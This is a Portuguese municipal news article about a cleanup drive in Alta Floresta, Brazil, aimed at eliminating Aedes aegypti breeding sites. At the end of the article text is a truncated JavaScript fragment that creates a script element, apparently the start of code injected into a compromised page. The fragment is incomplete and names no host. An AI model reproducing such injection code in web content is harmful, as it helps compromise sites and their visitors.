Capa / Cultura / Mutirão de limpeza é incentivo à cidadania

Mutirão de limpeza é incentivo à cidadania

Mutirão de limpeza é incentivo à cidadania1Lindomar Leal
Assessoria PMAF

O Mutirão de limpeza, que teve início na segunda-feira,11, no Bairro Jardim Panorama, seguindo para os Bairros Jardim Renascer, Primavera, das Oliveiras, Universitário, é um fator positivo para o exercício da cidadania dos altaflorestenses.
Esta iniciativa executada pela Secretaria de Infraestrutura, que realiza o patrulhamento e cascalhamento nos pontos críticos das ruas e avenidas, juntamente com a Força Tarefa da Secretaria de Saúde, Vigilância Ambiental, vem incentivando a população de Alta Floresta a manter limpo o quintal de suas residências, resultando na conscientização dos moradores em criar cidadãos.
A verdade é que com os trabalhos realizados pela Vigilância Epidemiológica Ambiental, sobre a coordenação de Silvio Cardoso, na realização educacional leva a prevenção de impedir a proliferação do vetor das doenças causadas pelo mosquito Aedes Aegypti, como a Dengue, Zika vírus e Chikungunya.
Outro fator essencial é o apoio dado pelas empresas, Arte Jones Extração e Comércio de Areia, que contribuíram com o caminhão basculante para remoção dos lixos e entulhos, assim como a empresa Buriti Empreendimentos, que cedeu 2 caminhões basculante e 1 pá carregadeira, para auxiliar na Força Tarefa.
Neste Mutirão foram retirados até na última segunda-feira,19, mais de 250 cargas de lixo seco e entulhos.
Nas atividades do Plano de Enfrentamento à Microcefalia, as equipes de Agentes de Saúde realizam pesquisa vetorial por meio das visitas domiciliares para a localização e remoção de possíveis focos e criadouros do mosquito transmissor. Do início até o momento atual foram encontrados e eliminados focos larvais em todos os Bairros.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top